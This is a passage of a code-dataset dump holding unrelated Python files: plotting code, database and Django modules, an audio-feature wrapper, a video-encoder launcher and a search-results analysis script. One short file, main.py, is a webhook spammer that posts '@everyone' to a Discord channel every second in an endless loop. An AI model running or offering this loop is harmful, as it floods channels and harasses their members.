capsize=4)\na2=axs[plotCol].bar(X + bar_group_distance, np.array(dataQuarantineTime[1]) - np.array(dataQuarantineTimeSusceptible[1]), bottom=dataQuarantineTimeSusceptible[1], color = colorsBase[1], width = bar_width, yerr=dataQuarantineTimeCI[1], capsize=4)\na3=axs[plotCol].bar(X + 2 * bar_group_distance, np.array(dataQuarantineTime[2]) - np.array(dataQuarantineTimeSusceptible[2]), bottom=dataQuarantineTimeSusceptible[2], color = colorsBase[2], width = bar_width, yerr=dataQuarantineTimeCI[2], capsize=4)\na4=axs[plotCol].bar(X + 3 * bar_group_distance, np.array(dataQuarantineTime[3]) - np.array(dataQuarantineTimeSusceptible[3]), bottom=dataQuarantineTimeSusceptible[3], color = colorsBase[3], width = bar_width, yerr=dataQuarantineTimeCI[3], capsize=4)\na5=axs[plotCol].bar(X + 4 * bar_group_distance, np.array(dataQuarantineTime[4]) - np.array(dataQuarantineTimeSusceptible[4]), bottom=dataQuarantineTimeSusceptible[4], color = colorsBase[4], width = bar_width, yerr=dataQuarantineTimeCI[4], capsize=4)\n\na1b=axs[plotCol].bar(X + 0, dataQuarantineTimeSusceptible[0], hatch=\"//\", color = colorsLight[0], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[0], capsize=4, ecolor='blue')\na2b=axs[plotCol].bar(X + bar_group_distance, dataQuarantineTimeSusceptible[1], hatch=\"//\", color = colorsLight[1], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[1], capsize=4, ecolor='blue')\na3b=axs[plotCol].bar(X + 2 * bar_group_distance, dataQuarantineTimeSusceptible[2], hatch=\"//\", color = colorsLight[2], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[2], capsize=4, ecolor='blue')\na4b=axs[plotCol].bar(X + 3 * bar_group_distance, dataQuarantineTimeSusceptible[3], hatch=\"//\", color = colorsLight[3], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[3], capsize=4, ecolor='blue')\na5b=axs[plotCol].bar(X + 4 * bar_group_distance, dataQuarantineTimeSusceptible[4], hatch=\"//\", color = colorsLight[4], width = bar_width, yerr=dataQuarantineTimeSusceptibleCI[4], capsize=4, ecolor='blue')\n\naxs[plotCol].set_title(\"C Quarantine time\")\naxs[plotCol].set_xlabel(\"Proximity detection range\")\naxs[plotCol].set_ylabel(\"Time of quarantine per person, average and 90% CI [days]\")\naxs[plotCol].set_xticks(X + 2 * bar_group_distance)\naxs[plotCol].set_xticklabels([\"0.2 m\",\"1 m\",\"2 m\",\"10 m\",\"Site-wide\"])\naxs[plotCol].legend(labels=['No CT', '20% adoption', '40% adoption', '60% adoption', '80% adoption', '100% adoption', '20% adoption, susceptible', '40% adoption, susceptible', '60% adoption, susceptible', '80% adoption, susceptible', '100% adoption, susceptible'], loc='upper left')\n\nfig.tight_layout(rect=[0, 0.03, 1, 0.95])\nplt.savefig(path+\"/figure_4.png\")\nplt.show()","sub_path":"print_figure_4.py","file_name":"print_figure_4.py","file_ext":"py","file_size_in_byte":13105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"36062670","text":"from discord_webhook import DiscordWebhook, DiscordEmbed\nimport time\n\ndef spam():\n webhook = DiscordWebhook(url='WEBHOOK_URL', content='@everyone')\n\n ## replace WEBHOOK_URL with your webhook url\n\n response = webhook.execute()\n\nwhile True:\n spam()\n time.sleep(1) ## replace 1 with number of seconds you want per post (keep 1 as default due to being rate limited)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"588998977","text":"from 
sqlalchemy import Column, Integer, String, Date, ForeignKey\nfrom repositories.base import Base\nfrom repositories.turmas import Turma\nfrom repositories.polos import Polo\nfrom repositories.pessoas import Pessoa\n\nclass Aula(Base):\n\t__tablename__ = 'aulas'\n\n\tid_aulas = Column(Integer, primary_key=True)\n\ttema = Column(String)\n\tdescricao = Column(String)\n\tdata = Column(Date)\n\tturmas_id_turmas = Column(Integer, ForeignKey('turmas.id_turmas'))\n\tpolos_id_polos = Column(Integer, ForeignKey('polos.id_polos'))\n\tid_professor = Column(Integer, ForeignKey('pessoas.id_pessoas'))\n\n\tdef to_json(self):\n\t\treturn {\n\t\t\t'id_aulas': self.id_aulas,\n\t\t\t'tema': self.tema,\n\t\t\t'descricao': self.descricao\n\t\t}\n\n\nclass AllAulas():\n\t\n\tdef __init__(self, session):\n\t\tself.session = session\n\n\tdef create(self, tema, descricao, data, turmas_id_turmas, polos_id_polos, id_professor):\n\t\tnova_aula = Aula()\n\t\tnova_aula.tema = tema\n\t\tnova_aula.descricao = descricao\n\t\tnova_aula.data = data\n\t\tnova_aula.turmas_id_turmas = turmas_id_turmas\n\t\tnova_aula.polos_id_polos= polos_id_polos\n\t\tnova_aula.id_professor = id_professor\n\n\t\ttry:\n\t\t\tself.session.add(nova_aula)\n\t\t\tself.session.commit()\n\t\t\treturn nova_aula.to_json()\n\t\texcept:\n\t\t\tself.session.rollback()\n\t\t\traise\n\n\tdef readAll(self):\n\t\taulas = self.session.query(Aula).all()\n\t\tnova_lista = []\n\t\tfor aula in aulas:\n\t\t\tnova_lista.append(aula.to_json())\n\t\treturn nova_lista\n\n\tdef read(self, id_aulas):\n\t\taula = self.session.query(Aula).filter_by(id_aulas = id_aulas).first()\n\t\treturn aula.to_json() if aula else None\n\n\tdef update(self, id_aulas, tema, descricao, data, turmas_id_turmas, polos_id_polos, id_professor):\n\t\ttry:\n\t\t\taula = self.session.query(Aula).filter_by(id_aulas = id_aulas).first()\n\t\t\tif not aula:\n\t\t\t\treturn None\n\t\t\taula.tema = tema\n\t\t\taula.descricao = descricao\n\t\t\taula.data = data\n\t\t\taula.turmas_id_turmas = turmas_id_turmas\n\t\t\taula.polos_id_polos = polos_id_polos\n\t\t\taula.id_professor = id_professor\n\t\t\tself.session.commit()\n\t\t\treturn aula.to_json()\n\t\texcept:\n\t\t\tself.session.rollback()\n\t\t\traise","sub_path":"repositories/aulas.py","file_name":"aulas.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"21652031","text":"#!/usr/bin/env python2\n#-*- encoding: utf-8 -*-\n\nfrom collections import OrderedDict\n\nimport numpy as np\nfrom yaafelib import FeaturePlan, Engine, AudioFileProcessor\n\n\nclass AudioFeatureProcessor(object):\n \"\"\" Yaafe wrapper\n Usage:\n afp = AudioFeatureProcessor(sample_rate)\n data = afp.process(file)\n \n return a conactenated single-dimensional array consisting of\n 7 statistically reduced features\n \"\"\"\n\n FEATURES = {\n 'loudness' : (\"Loudness blockSize=512 stepSize=128 >\"\n \"StatisticalIntegrator NbFrames=40 StepNbFrames=8\"),\n 'mfcc' : (\"MFCC blockSize=512 stepSize=128 > StatisticalIntegrator \"\n \"NbFrames=40 StepNbFrames=8\"),\n 'obsi' : (\"OBSI blockSize=512 stepSize=128 > StatisticalIntegrator \"\n \"NbFrames=40 StepNbFrames=8\"),\n 'obsir' : (\"OBSIR blockSize=512 stepSize=128 >\"\n \"StatisticalIntegrator NbFrames=40 StepNbFrames=8\"),\n 'spect_crest' : (\"SpectralCrestFactorPerBand blockSize=512 \"\n \"stepSize=128 > StatisticalIntegrator NbFrames=40 \"\n \"StepNbFrames=8\"),\n 'spect_flat_band': (\"SpectralFlatnessPerBand blockSize=512 \"\n 
\"stepSize=128 > StatisticalIntegrator NbFrames=40 \"\n \"StepNbFrames=8\"),\n 'spect_shape' : (\"SpectralShapeStatistics blockSize=512 stepSize=128 \"\n \"> StatisticalIntegrator NbFrames=40 StepNbFrames=8\")\n }\n \n FEATURES = OrderedDict(sorted(FEATURES.items()))\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n self.setup()\n\n def setup(self):\n \"\"\" Initialize Yaafe internal components \"\"\"\n self.fp = FeaturePlan(\n sample_rate = self.sample_rate,\n normalize = 0.98)\n for name, desc in self.FEATURES.items():\n self.fp.addFeature(\"%s: %s\" % (name, desc))\n self.df = self.fp.getDataFlow()\n self.engine = Engine()\n self.engine.load(self.df)\n self.afp = AudioFileProcessor()\n \n def process(self, audiofile):\n self.afp.processFile(self.engine, audiofile)\n out = OrderedDict(sorted(self.engine.readAllOutputs().items()))\n self.engine.flush()\n return self.transform(out)\n \n @staticmethod\n def transform(data_dict):\n \"\"\" Extract min, std, mean, max from each feature and return a single\n dimensional array\n \"\"\"\n X = np.empty(0)\n for feat, data in data_dict.items():\n mn = np.amin(data, axis=0)\n sd = np.std(data, axis=0)\n av = np.mean(data, axis=0)\n mx = np.amax(data, axis=0)\n X = np.append(X, ([mn, sd, av, mx]))\n return X\n \n","sub_path":"musicore/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"438434516","text":"from django.conf.urls import url\nfrom rest_framework.authtoken.views import obtain_auth_token\nfrom .views import User_Registration_API_View, User_Deactivate_API_View, UserExistsAPIView,All_User_API_View\n\nurlpatterns = [\n # authtoken view to retrieve the user token \n # username, password, POST\n url(r'^login/$', obtain_auth_token, name='obtain_token'),\n # username, password, first_name, last_name, email, phone_number POST\n url(r'^register/$',User_Registration_API_View.as_view(), name='register_user'),\n # token of the user through POST \n url(r'^deactivate/$', User_Deactivate_API_View.as_view(), name='deactivate'),\n # pass in a username(POST) to find out whether it is available or no\n # if username is available then error response with code 400 bad request with 'failed' name string\n # else sucess with code 200 OK with 'success' named string.\n url(r'^unique_username/$', UserExistsAPIView.as_view(), name='unique_username'),\n #Gives all user information in API form\n url(r'^all_user/$', All_User_API_View.as_view(), name='all_user'),\n]","sub_path":"Accounts/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448543793","text":"\"\"\"Programme : Encodeur graphique du JTX, codé en python avec tkinter et le module os.\nPar Raphaël Olivier, Respo archives 2014.\n\nAvant ce programme, l'encodeur utilisé était le script BATCH JTX-Encoder. Quelques problèmes :\n-Pas super user-friendly : le terminal fait peur à tout le monde depuis que l'intersection du JTX et du BR est réduite à l'ensemble vide ou presque. 
En plus il faut déplacer le .bat dans le dossier de destination pour que ça marche.\n-Pas très adaptable à ses besoins : deux modes et c'est tout\n-Le bidouillage du code était assez lourd parce que putain, batch c'est moche.\n\nCe programme tente de remédier à ces problèmes.\n-Il a une interface graphique\n-Le dossier où on encode est choisi dans l'interface\n-Plusieurs modes en un clic, et possibilité de choisir beaucoup d'options.\n-le code est conçu pour que l'ajout de nouveaux modes d'encodages adaptés aux besoins du JTX soit facile, tout comme l'adaptation des modes existants.\n-python, c'est un langage qui ne fait pas trop peur et qui permet de faire des interfaces et d'interagir avec le système.\n\nIl a cependant ses défauts:\n-Ce n'est plus un script : impossible de l'appeler en commande. Cependant, le fichier ffmpegLauncher sera facilement transformé en un tel script si besoin.\n-Dur de faire en sorte que python soit installé sur tous les ordis du local. Donc on manipule de gros executables qui contiennent l'interpréteur python et tous les modules utilisés.\n-Le code est nettement plus long.\n-On utilise ffmpeg depuis différents dossiers sans trimballer un ffmpeg.exe. Il faut donc que ffmpeg soit installé sur l'ordi et dans le PATH. A l'occasion de l'installation de cet encodeur le JTX2014 a ajouté ffmpeg au PATH de toutes les stations de montage. Il faudra répéter la procédure avec tout nouvel ordi (procédure détaillée dans le dossier ffmpeg, présent dans le dossier du Respo archives et à la racine de toutes les stations de montage)\n\nLe code est maldroit en plusieurs points, parce que je ne suis pas un pro de python. Si quelque chose te choque, futur respo info/archives/autre/rien, n'hésite pas à mettre ce programme à jour.\n\"\"\"\n\n\nfrom mainInterface import MainInterface # L'interface qui appelle les autres\nfrom ffmpegLauncher import FfmpegLauncher # La classe qui gère les appels à ffmpeg et la manipulation des fichiers\nfrom tkinter import * # Module python pour les interfaces graphiques. Bon chapitre dans le cours de python d'openclassrooms et doc officielle bien faite.\n\nfenetre = Tk()\ninterface = MainInterface(fenetre)\ninterface.mainloop() #La fenêtre reste ouverte jusqu'à appel de sa méthode quit\nif(interface.confirmer_lancement_encodage==1): #Vrai si on n'a pas quitté en cours de route\n\n #Avant de fermer la fenêtre, on copie les champs de l'interface. 
Ouais, niveau encapsulation c'est pas terrible.\n rep=interface.rep\n dict_preconfig=interface.dict_preconfig\n suppr_originaux=interface.suppr_originaux\n sous_dossier_originaux=interface.sous_dossier_originaux\n appliquer_sous_dossiers=interface.appliquer_sous_dossiers\n choix_formats=interface.choix_formats\n fenetre.destroy()\n\n #Encodage\n lanceur = FfmpegLauncher(rep,dict_preconfig,suppr_originaux,sous_dossier_originaux,appliquer_sous_dossiers,choix_formats)\n lanceur.lancer()\nelse:\n fenetre.destroy()\n","sub_path":"JTX-Encoder-GUI.py","file_name":"JTX-Encoder-GUI.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"165842489","text":"\n#%%\n# defaults\nimport json\nimport glob\nimport sys\nfrom collections import defaultdict\nfrom urllib.parse import urlparse\nfrom pprint import pprint\n\n\n# plotting\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport seaborn as sns\n\n# scipy\nimport pandas as pd\nimport numpy as np\n\nfrom PIL import Image\n\ninfinite_defaultdict = lambda: defaultdict(infinite_defaultdict)\ndef recurse_print_infinitedict(d, prefix=''):\n if type(d) != defaultdict:\n print(prefix, d)\n return\n for k, v in d.items():\n print(prefix, k)\n recurse_print_infinitedict(v, prefix + ' ')\n\n\n\n#%%\n# Display parameters\nfull_width = 8\nLH_W = 780\n\n#IPHONE_SE_H = 568\nIPHONE_6_H = 667\nIPHONE_6plus_H = 736\nIPHONE_X_H = 812\n\n#110% zoom\n# MACBOOK13_11_H = 717\n# MACBOOK13_FULL_H = 789\n# # 90% zoom\n# MACBOOK13_9_H = 877\n\n#https://gs.statcounter.com/screen-resolution-stats/desktop/worldwide\nMOST_COMMON = 768\nZOOM_90 = 853\nZOOM_110 = 698\n\n\nmobile_lines = {\n 'noscroll_lb': IPHONE_6_H,\n 'noscroll_mg': IPHONE_6plus_H,\n 'noscroll_ub': IPHONE_X_H\n}\n\ndesktop_lines = {\n 'noscroll_lb': ZOOM_110,\n 'noscroll_mg': MOST_COMMON,\n 'noscroll_ub': ZOOM_90,\n}\n\nBORDER_PIX = 1440\n\n#%%\n# Helpers\ndef extract(x):\n domain = urlparse(x.href).netloc\n return domain\n # try:\n # ret = '.'.join(domain.split('.')[:2])\n # except:\n # ret = domain\n # return ret\n\ndef norm_df(df, mobile=False):\n df['width'] = df.right - df.left\n df['height'] = df.bottom - df.top\n right_max = df['right'].max()\n bot_max = df['bottom'].max()\n\n # normalize all x-axis values relative to rightmost point\n for key in ['width', 'left', 'right']:\n df['norm_{}'.format(key)] = df[key] / right_max\n\n # normalize all y-axis values relative to bottommost point\n for key in ['height', 'top', 'bottom']:\n df['norm_{}'.format(key)] = df[key] / bot_max\n\n # treat links to DDG twitter & reddit as internal\n df.loc[df.href == 'https://twitter.com/duckduckgo', 'href'] = 'www.duckduckgo.com'\n df.loc[df.href == 'https://reddit.com/r/duckduckgo', 'href'] = 'www.duckduckgo.com'\n\n df['domain'] = df.apply(extract, axis=1)\n\n domains = [\n 'wikipedia',\n 'twitter', 'youtube',\n 'facebook',\n ]\n\n df['platform_ugc'] = df['domain'].str.contains('|'.join(\n domains\n ))\n \n for domain in domains:\n df[f'{domain}_in'] = df['domain'].str.contains(domain)\n df[f'{domain}_appears'] = (\n df['domain'].str.contains(domain) &\n (df.width != 0) & (df.height != 0)\n )\n kp_line = LH_W / right_max\n # source: \n\n if mobile:\n # no right-hand incidence\n df[f'{domain}_appears_rh'] = 0\n # no lefthand above-the-fold incidence\n df[f'{domain}_appears_lh'] = 0\n for name, line in mobile_lines.items():\n mobile_noscroll_line = line / bot_max\n\n df[f'{domain}_appears_{name}'] = (\n (df[f'{domain}_appears']) &\n 
(df.norm_top < mobile_noscroll_line)\n )\n\n df[f'{domain}_appears_lh_{name}'] = 0\n\n else:\n df[f'{domain}_appears_rh'] = (\n (df[f'{domain}_appears']) &\n (df.norm_left > kp_line)\n )\n\n df[f'{domain}_appears_lh'] = (\n (df[f'{domain}_appears']) &\n (df.norm_left <= kp_line)\n )\n\n for name, line in desktop_lines.items():\n noscroll_line = line / bot_max\n\n df[f'{domain}_appears_{name}'] = (\n (df[f'{domain}_appears']) &\n (df.norm_top < noscroll_line)\n )\n\n df[f'{domain}_appears_lh_{name}'] = (\n (df[f'{domain}_appears_lh']) &\n (df.norm_top < noscroll_line)\n )\n return df\n\n\n#%%\n# Experiment parameters (which experiments to load)\ndevices = [\n 'desktop',\n 'mobile'\n]\nsearch_engines = [\n 'google',\n 'bing',\n 'duckduckgo',\n]\nquery_sets = [\n 'top',\n 'med',\n 'trend',\n]\nconfigs = []\nfor device in devices:\n for search_engine in search_engines:\n for queries in query_sets:\n configs.append({\n 'device': device,\n 'search_engine': search_engine,\n 'queries': queries,\n })\n\n\n#%%\ndfs = infinite_defaultdict()\n# device, search_engine, queries\n\nerr_queries = infinite_defaultdict()\nquery_links = infinite_defaultdict()\nquery_counts = infinite_defaultdict()\n\nfor config in configs:\n device = config['device']\n search_engine = config['search_engine']\n queries = config['queries']\n print(device, search_engine, queries)\n\n k = f'{device}_{search_engine}_{queries}'\n\n folder = f'scraper_output/{device}/{search_engine}/{queries}'\n\n try:\n with open(f'{folder}/results.json', 'r', encoding='utf8') as f:\n d = json.load(f)\n except FileNotFoundError:\n d = {}\n \n n_queries = len(d.keys())\n print(' # queries collected:', n_queries)\n \n num_errs = 0\n for query in d.keys():\n try:\n links = d[query]['1_xy']\n #print(links)\n for link in links:\n #print(link)\n link['query'] = query\n query_links[device][search_engine][queries][query] = links\n except KeyError:\n err_queries[device][search_engine][queries][query] = d[query]\n num_errs += 1\n print(' # errs,', num_errs)\n for itera in [1, 2, 3, 4, 5, 6, 7]:\n try:\n err_folder = f'scraper_output/{device}/{search_engine}/errs{itera}_{device}_{search_engine}_{queries}'\n with open(f'{err_folder}/results.json', 'r', encoding='utf8') as f:\n err_d = json.load(f)\n #print(' Loaded errfile, Will take precedence over existing links for a given query')\n for query in err_d.keys():\n try:\n links = err_d[query]['1_xy']\n for link in links:\n link['query'] = query\n # if query in query_links[device][search_engine][queries]:\n # print(f'OVERWRITE: {device} {search_engine} {queries} {query}')\n # we already have this query?\n query_links[device][search_engine][queries][query] = links\n except KeyError:\n print('Key error in errfile')\n print(f' success for itera {itera}!', len(err_d.keys()))\n except Exception as e:\n err_d = {}\n\n all_links = []\n for query, links in query_links[device][search_engine][queries].items():\n all_links += links\n query_counts[device][search_engine][queries] = len(query_links[device][search_engine][queries])\n dfs[device][search_engine][queries] = norm_df(pd.DataFrame(all_links), device == 'mobile')\n\n#%%\nrecurse_print_infinitedict(query_counts)\n#%%\n# let's see which queries we're missing and write a new file to scrape them\ncmds = []\n# manual increment\nitera = 8\nfor config in configs:\n device = config['device']\n search_engine = config['search_engine']\n queries = config['queries']\n cur_queries = list(query_links[device][search_engine][queries].keys())\n\n with 
open(f'search_queries/prepped/{queries}.txt', 'r', encoding='utf8') as f:\n lines = f.read().splitlines()\n print(device, search_engine, queries)\n\n missing = set(lines) - set(cur_queries)\n print( 'Missing')\n print(missing)\n if missing:\n with open(\n f'search_queries/prepped/errs{itera}_{device}_{search_engine}_{queries}.txt',\n 'w', encoding='utf8') as f:\n f.write('\\n'.join(list(missing)))\n cmds.append(\n f'/usr/bin/time -v node driver.js {device} {search_engine} errs{itera}_{device}_{search_engine}_{queries} &> logs/errs{itera}_{device}_{search_engine}_{queries}.txt'\n )\nwith open(f'errs.sh', 'w') as f:\n f.write('\\n'.join(cmds))\n\n\n#%%\n# Let's see which links are most common\nfor_concat_list = []\nfor config in configs:\n device = config['device']\n if device == 'mobile':\n continue\n search_engine = config['search_engine']\n queries = config['queries']\n print(device, search_engine, queries)\n for_concat_df = dfs[device][search_engine][queries][['domain']]\n for_concat_list.append(for_concat_df)\n #print(for_concat_df['domain'].value_counts()[:20])\npd.concat(for_concat_list)['domain'].value_counts()[:15]\n\n\n#%%\n# source: https://stackoverflow.com/questions/30227466/combine-several-images-horizontally-with-python\n\n\n#%%\n# create the coordinate visualization\nDO_COORDS = False\nif DO_COORDS:\n for config in configs:\n device = config['device']\n search_engine = config['search_engine']\n queries = config['queries']\n\n print(device, search_engine, queries)\n df = dfs[device][search_engine][queries]\n if type(df) == defaultdict:\n continue\n right_max = df['right'].max()\n bot_max = df['bottom'].max()\n ratio = bot_max / right_max\n k = f'{device}_{search_engine}_{queries}'\n\n cur_queries = list(query_links[device][search_engine][queries].keys())\n np.random.seed(0)\n chosen_ones = np.random.choice(cur_queries, 10, replace=False)\n with open(f'reports/samples/{k}.txt', 'w', encoding='utf8') as f:\n f.write('\\n'.join(chosen_ones))\n for query in cur_queries + [None]:\n \n if query:\n subdf = df[df['query'] == query]\n else:\n subdf = df\n fig, ax = plt.subplots(1, 1, figsize=(full_width, full_width * ratio))\n plt.gca().invert_yaxis()\n #print('Query:', query, '# links', len(subdf))\n add_last = []\n for i_row, row in subdf.iterrows():\n if row.width == 0 or row.height == 0:\n continue\n # x = row['norm_left']\n # y = row['norm_bottom']\n # width = row['norm_width']\n # height = row['norm_height']\n x = row['left']\n y = row['bottom']\n width = row['width']\n height = row['height']\n domain = row['domain']\n\n if row['wikipedia_appears']:\n add_last.append([domain, (x,y,), width, height])\n else:\n # if row['platform_ugc']:\n # color = 'b'\n if 'google' in domain or 'bing' in domain or 'duckduckgo' in domain:\n color = 'lightgray'\n else:\n color = 'grey'\n plt.annotate(domain, (x, y), color=color)\n # Add the patch to the Axes\n rect = matplotlib.patches.Rectangle((x,y),width,height,linewidth=1,edgecolor=color,facecolor='none')\n ax.add_patch(rect)\n for domain, coords, width, height in add_last:\n plt.annotate(domain, coords, color='g')\n rect = matplotlib.patches.Rectangle(coords,width,height,linewidth=2,edgecolor=color,facecolor='none')\n ax.add_patch(rect)\n\n # kp line = lefthand width border.\n kp_line = LH_W\n if device == 'mobile':\n scroll_line = mobile_lines['noscroll_mg']\n else:\n scroll_line = desktop_lines['noscroll_mg']\n #scroll_line /= bot_max\n plt.axvline(kp_line, color='r', linestyle='-')\n\n #border_line = BORDER_PIX / right_max\n 
#plt.axvline(border_line, color='k', linestyle='-')\n plt.axhline(scroll_line, color='k', linestyle='-')\n\n plt.savefig(f'reports/overlays/{k}_{query}.png')\n if query == 'nba':\n plt.savefig(f'reports/{k}_{query}.png')\n plt.close()\n if query in chosen_ones:\n screenshot_path = f'scraper_output/{device}/{search_engine}/{queries}/results.json_{query}.png'\n # the overlay will be smaller\n try:\n screenshot_img = Image.open(screenshot_path)\n big_w, big_h = screenshot_img.size\n overlay_img = Image.open(f'reports/overlays/{k}_{query}.png')\n small_w, small_h = overlay_img.size\n except FileNotFoundError: \n continue\n\n h_percent = (big_h/float(small_h))\n new_w = int((float(small_w) * float(h_percent)))\n resized_overlay = overlay_img.resize((new_w,big_h), Image.ANTIALIAS)\n\n total_width = new_w + big_w\n\n new_im = Image.new('RGB', (total_width, big_h))\n\n x_offset = 0\n for im in (screenshot_img, resized_overlay):\n new_im.paste(im, (x_offset,0))\n x_offset += im.size[0]\n\n new_im.save(f'reports/samples/concat_{k}_{query}.png')\n\n\n#%%\n# toss results in here for easy dataframe creation\nrow_dicts = []\nfor config in configs:\n device = config['device']\n search_engine = config['search_engine']\n queries = config['queries']\n\n print(device, search_engine, queries)\n k = f'{device}_{search_engine}_{queries}'\n df = dfs[device][search_engine][queries]\n if type(df) == defaultdict:\n continue\n\n inc_rate = df.groupby('query').wikipedia_appears.agg(any).mean()\n rh_inc_rate = df.groupby('query').wikipedia_appears_rh.agg(any).mean()\n lh_inc_rate = df.groupby('query').wikipedia_appears_lh.agg(any).mean()\n\n\n if device == 'mobile':\n d = mobile_lines\n else:\n d = desktop_lines\n matches = set(df[df.wikipedia_appears == True]['query'])\n\n row_dict = {\n 'queries': queries,\n 'search_engine': search_engine,\n 'device': device,\n 'inc_rate': inc_rate,\n 'rh_inc_rate': rh_inc_rate,\n 'lh_inc_rate': lh_inc_rate,\n 'matches': matches\n }\n for name in d.keys():\n row_dict[f'{name}_inc_rate'] = df.groupby('query')[f'wikipedia_appears_{name}'].agg(any).mean()\n row_dict[f'lh_{name}_inc_rate'] = df.groupby('query')[f'wikipedia_appears_lh_{name}'].agg(any).mean()\n for domain in [\n 'twitter', 'youtube',\n 'facebook',\n ]:\n row_dict[f'{domain}_inc_rate'] = df.groupby('query')[f'{domain}_appears'].agg(any).mean() \n\n\n row_dicts.append(row_dict)\n#%%\nresults_df = pd.DataFrame(row_dicts)\nresults_df\n\n#%%\nresults_df[results_df['queries'] == 'med']\n\n# %%\nFP = 'Full-page incidence'\nRH = 'Right-hand incidence'\nLH = 'Left-hand incidence'\nAF_MG = 'Above-the-fold incidence'\nAF_pretty = 'Above-the-fold incidence (lower bound - upper bound)'\n\nLH_AF_pretty = 'Left-hand above-the-fold incidence (lower bound - upper bound)'\nLH_AF_LB = 'Left-hand above-the-fold incidence (lower bound)' \nLH_AF_MG = 'Left-hand above-the-fold incidence'\nLH_AF_UB = 'Left-hand above-the-fold incidence (upper bound)' \n\nAF_LB = 'Above-the-fold incidence (lower bound)'\nAF_UB = 'Above-the-fold incidence (upper bound)'\n\n\ncols = [\n 'device', 'search_engine', 'queries', 'inc_rate', 'rh_inc_rate',\n 'lh_inc_rate',\n]\nfor name in mobile_lines.keys():\n cols += [f'{name}_inc_rate', f'lh_{name}_inc_rate']\nprint(cols)\n\nrenamed = results_df[cols]\nrenamed.rename(columns={\n 'device': 'Device', 'search_engine': 'Search Engine',\n 'queries': 'Query Category', 'inc_rate': FP,\n 'rh_inc_rate': RH,\n 'lh_inc_rate': LH,\n 'lh_noscroll_lb_inc_rate': LH_AF_LB,\n 'lh_noscroll_mg_inc_rate': LH_AF_MG,\n 
'lh_noscroll_ub_inc_rate': LH_AF_UB,\n 'noscroll_lb_inc_rate': AF_LB,\n 'noscroll_mg_inc_rate': AF_MG,\n 'noscroll_ub_inc_rate': AF_UB,\n 'youtube_inc_rate': 'Youtube incidence rate',\n 'twitter_inc_rate': 'Twitter incidence rate',\n}, inplace=True)\n\ndef pretty_bounds(row):\n mg = row[AF_MG]\n lb = row[AF_LB]\n ub = row[AF_UB]\n return f'{mg:.2f} ({lb:.2f} - {ub:.2f})'\n\ndef pretty_bounds_lh(row):\n mg = row[LH_AF_MG]\n lb = row[LH_AF_LB]\n ub = row[LH_AF_UB]\n return f'{mg:.2f} ({lb:.2f} - {ub:.2f})'\n\nrenamed[AF_pretty] = renamed.apply(pretty_bounds, axis=1)\nrenamed[LH_AF_pretty] = renamed.apply(pretty_bounds_lh, axis=1)\n\nrenamed.replace(to_replace={\n 'top': 'common',\n 'med': 'medical',\n 'trend': 'trending',\n}, inplace=True)\nrenamed\n\nrenamed[[\n 'Device', 'Search Engine', 'Query Category',\n FP, RH, LH, AF_pretty, LH_AF_pretty\n]].to_csv('reports/main.csv', float_format=\"%.2f\", index=False)\n\n#%%\nrenamed[\n renamed.Device == 'desktop'\n][[\n 'Search Engine', 'Query Category',\n FP, LH, RH, AF_pretty, LH_AF_pretty\n]].to_csv('reports/desktop.csv', float_format=\"%.2f\", index=False)\nrenamed[\n renamed.Device == 'mobile'\n][[\n 'Search Engine', 'Query Category',\n FP, AF_pretty\n]].to_csv('reports/mobile.csv', float_format=\"%.2f\", index=False)\n\n#%%\nrenamed\n\n#%%\nbaseline_df = results_df[['device', 'search_engine', 'queries', 'twitter_inc_rate', 'youtube_inc_rate', 'facebook_inc_rate']]\nbaseline_df.rename(columns={\n 'device': 'Device', 'search_engine': 'Search Engine',\n 'queries': 'Query Category'\n}, inplace=True)\nbaseline_df.to_csv('reports/other_domains.csv', float_format=\"%.2f\", index=False)\n\n\n\n#%%\nmelted = renamed.melt(id_vars=['Device', 'Search Engine', 'Query Category'])\nmelted.rename(columns={\n 'variable': 'y-axis',\n 'value': 'Incidence rate',\n}, inplace=True)\nsns.set()\ng = sns.catplot(\n x=\"Query Category\", y='Incidence rate',\n hue=\"Search Engine\", col=\"Device\", row='y-axis',\n palette=['g', 'b', 'y'],\n order=['common', 'trending', 'medical'],\n #row_order=[FP, AF, RH],\n data=melted[melted['y-axis'] == FP], kind=\"bar\",\n height=3, aspect=1.5, ci=None,\n sharex=False,\n)\nplt.savefig('reports/FP_catplot.png', dpi=300)\n\n#%%\n# lh vs rh\ng = sns.catplot(\n x=\"Query Category\", y='Incidence rate',\n hue=\"Search Engine\", col='y-axis',\n col_order=[LH, RH],\n palette=['g', 'b', 'y'],\n order=['common', 'trending', 'medical'],\n data=melted[\n ((melted['y-axis'] == LH) | (melted['y-axis'] == RH))\n & (melted['Device'] == 'desktop')],\n kind=\"bar\",\n height=3, aspect=1.5, ci=None,\n sharex=False,\n)\nplt.savefig('reports/LHRH_catplot.png', dpi=300)\n#%%\ng = sns.catplot(\n x=\"Query Category\", y='Incidence rate',\n hue=\"Search Engine\", col=\"Device\", row='y-axis',\n palette=['g', 'b', 'y'],\n order=['common', 'trending', 'medical'],\n #row_order=[FP, AF, RH],\n data=melted[melted['y-axis'] == AF_MG], kind=\"bar\",\n height=3, aspect=1.5, ci=None,\n sharex=False,\n)\nplt.savefig('reports/AF_catplot.png', dpi=300)\n\n#%%\ng = sns.catplot(\n x=\"Query Category\", y='Incidence rate',\n hue=\"Search Engine\", col=\"Device\", row='y-axis',\n palette=['g', 'b', 